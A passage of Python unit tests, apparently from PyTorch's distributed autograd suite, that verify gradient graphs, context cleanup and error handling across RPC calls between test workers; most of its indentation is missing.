    # receives two tensors t1 and t2, and forwards them via a nested rpc call to
    # the next dst. On the return route, it receives the result tensor t3 from
    # the next dst and forwards it back to the previous caller.
    # For this context in this rank, it expects a graph like this:
    #  send and recv functions for receiving and forwarding t1 and t2:
    #        rpcSendBackward
    #         /          \
    #  t1.recvRpcBackward  t2.recvRpcBackward
    #
    #  send and recv functions for receiving and forwarding t3:
    #        rpcSendBackward
    #               |
    #      t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
        # For the send function created when making the nested rpc call,
        # its next functions are the two recv functions
        # for the two tensors received from the previous call.
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
        # For the send function created when returning the response to the previous
        # call, its next function is the recv function
        # for the result tensor returned from the nested call.
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
            # One is for the current context id, when this rank sends the first rpc call.
            # The second is for the prev context id, when this rank makes the 1st nested
            # call.
            # The third is for the prev prev context id, when this rank makes the
            # 2nd nested call.
            # The last is for the prev prev prev context id, when this rank
            # executes the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
            # One is for the current context id, when this rank sends the first rpc
            # call and executes the torch.add() operator.
            # The other is for the prev context id, when this rank makes the
            # nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
            # NB: RRef.to_here() always passes the autograd context to the callee,
            # as the caller does not know whether the return value would contain a
            # requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
            # There should be at least one send and one recv event, corresponding to the send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
            # The CPU total for the backward event should be greater than send and recv,
            # since applying those functions in the backward pass is a subset of the
            # entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
    # The grad of the local tensor lives on the current rank, and the grad of
    # the rref tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
    # ps = rank0 with trainers = rank1/2/3
    # ps = rank1 with trainers = rank2/3/0
    # ps = rank2 with trainers = rank3/0/1
    # ps = rank3 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
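    # A quick worked example of the mapping above (illustrative only, assuming
    # world_size == 4 and the rank_diffs == [1, 2, 3] used in _test_trainer_ps):
    #
    #     >>> world_size = 4
    #     >>> {r: [(r + d) % world_size for d in (1, 2, 3)] for r in range(world_size)}
    #     {0: [1, 2, 3], 1: [2, 3, 0], 2: [3, 0, 1], 3: [0, 1, 2]}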
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
        # TODO: needs more investigation.
        # There is an RRef leak when shutting down; we suspect it is because the
        # RRef passed as an arg crosses the pybind boundary and is not garbage
        # collected by Python when calling shutdown().
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.chain_matmul, [val, t3, t4])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.chain_matmul, [t1, t2, t3])
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
            # We don't use the result of this RPC; as a result, the backward
            # pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
